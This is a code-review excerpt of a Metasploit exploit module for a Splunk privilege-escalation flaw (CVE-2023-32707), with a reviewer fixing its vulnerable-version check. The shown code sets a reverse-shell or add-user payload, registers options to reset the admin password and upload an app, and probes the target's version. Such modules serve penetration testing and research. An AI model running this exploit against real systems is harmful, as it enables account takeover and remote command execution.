modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb

```diff
@@ -0,0 +1,409 @@
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python',
+                # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'
+                'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
+              }
+            }
+          ],
+          [
+            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8000,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS, # requests are logged in the _audit index
+            # ARTIFACTS_ON_DISK # app is removed in the cleanup method
+          ]
+        },
+        'DisclosureDate' => '2023-06-01'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),
+        OptString.new('PASSWORD', [true, 'The password for the specified username']),
+        OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
+        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])
+      ]
+    )
+    # That depends on finding a strategy to distinguish commands that return output and commands that don't
+    # register_advanced_options(
+    #   [
+    #     OptBool.new('ReturnOutput', [ true, 'Display command output', false ])
+    #   ]
+    # )
+  end
+
+  def check
+    splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),
+      'method' => 'GET',
+      'cookie' => cookie,
+      'vars_get' => {
+        'output_mode' => 'json'
+      }
+    })
+
+    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200
+
+    body = res.get_json_document
+    version = Rex::Version.new(body['generator']['version'])
+
+    return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (
+      version < Rex::Version.new('9.0.5') ||
+      version < Rex::Version.new('8.2.11') ||
+      version < Rex::Version.new('8.1.14')
```

Comment:
Do we need to be more specific with these version checks? I got
`Detected Splunk version 8.2.12 which is vulnerable` 
which seems like it passes that first check.

Reply:
```suggestion
      (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||
      (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||
      (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))
```